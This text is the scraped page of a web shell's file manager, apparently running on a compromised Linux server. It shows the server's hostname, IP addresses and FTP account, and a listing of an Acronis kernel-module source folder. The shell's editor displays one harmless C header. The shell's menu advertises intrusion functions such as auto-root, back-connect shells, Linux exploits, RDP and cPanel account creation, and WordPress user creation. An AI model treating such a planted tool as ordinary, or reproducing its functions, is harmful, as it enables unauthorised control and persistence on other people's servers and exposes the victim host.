Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
src /
file_protector-1.1-1553 /
transport /
[ HOME SHELL ]
Name
Size
Permission
Action
device.c
1.2
KB
-rw-r--r--
device.h
257
B
-rw-r--r--
exec_event.c
7.13
KB
-rw-r--r--
exec_event.h
391
B
-rw-r--r--
exit_event.c
1.57
KB
-rw-r--r--
exit_event.h
291
B
-rw-r--r--
fork_event.c
8.61
KB
-rw-r--r--
fork_event.h
360
B
-rw-r--r--
fs_event.c
26.92
KB
-rw-r--r--
fs_event.h
2.43
KB
-rw-r--r--
message.c
19.66
KB
-rw-r--r--
message.h
4.03
KB
-rw-r--r--
ring.h
2.29
KB
-rw-r--r--
set.h
1.86
KB
-rw-r--r--
subtype.h
1.06
KB
-rw-r--r--
thread_safe_path.h
2.28
KB
-rw-r--r--
transport.c
61.56
KB
-rw-r--r--
transport.h
4.01
KB
-rw-r--r--
transport_id.h
1.75
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : subtype.h
/** @file subtype.h @brief Actual message subtype type based on amount of fields @details Copyright (c) 2024 Acronis International GmbH @author Denis Kopyrin (denis.kopyrin@acronis.com) @since $Id: $ */ #pragma once #include "transport_protocol.h" #include <linux/fcntl.h> #include <linux/types.h> #ifdef KERNEL_MOCK _Static_assert(FP_SI_ST_COUNT <= 16, "Too many subtypes, increase SUBTYPE_TYPE"); #endif #define SUBTYPE_MASK_TYPE uint16_t #define SUBTYPE_FMODE_READ 1 #define SUBTYPE_FMODE_WRITE 2 static inline uint8_t open_flags_to_subtype_fmode(unsigned int flags) { uint8_t subtype_mask; unsigned int accmode = flags & O_ACCMODE; switch (accmode) { case O_RDONLY: subtype_mask = SUBTYPE_FMODE_READ; break; case O_WRONLY: subtype_mask = SUBTYPE_FMODE_WRITE; break; default: subtype_mask = SUBTYPE_FMODE_READ | SUBTYPE_FMODE_WRITE; break; } // On Linux O_TRUNC will cause file modification so add it in fmode if (flags & O_TRUNC) { subtype_mask |= SUBTYPE_FMODE_WRITE; } return subtype_mask; }
Close